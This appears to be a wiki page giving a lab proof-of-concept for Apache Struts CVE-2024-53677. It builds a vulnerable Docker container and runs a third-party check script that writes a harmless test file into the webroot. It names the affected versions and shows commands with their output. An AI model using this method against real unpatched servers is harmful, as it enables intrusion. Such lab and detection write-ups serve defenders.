Struts - CVE-2024-53677 / S2-067
File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.
Vulnerable versions:
Struts 2.0.0 - Struts 2.3.37 (End-of-Life),
Struts 2.5.0 - Struts 2.5.33, and
Struts 6.0.0 - Struts 6.3.0.2
References:
Proof-of-Concept
Setup test environment
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
<form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
<table class="wwFormTable">
<tr>
<td class="tdLabel"></td>
<td
class="tdInput"
><input type="file" name="upload" id="upload_upload"/></td>
</tr>
<tr>
<td colspan="2">
<div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
</td>
</tr>
</table>
</form>
</body>
</html>Exploit
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
Last updated
Was this helpful?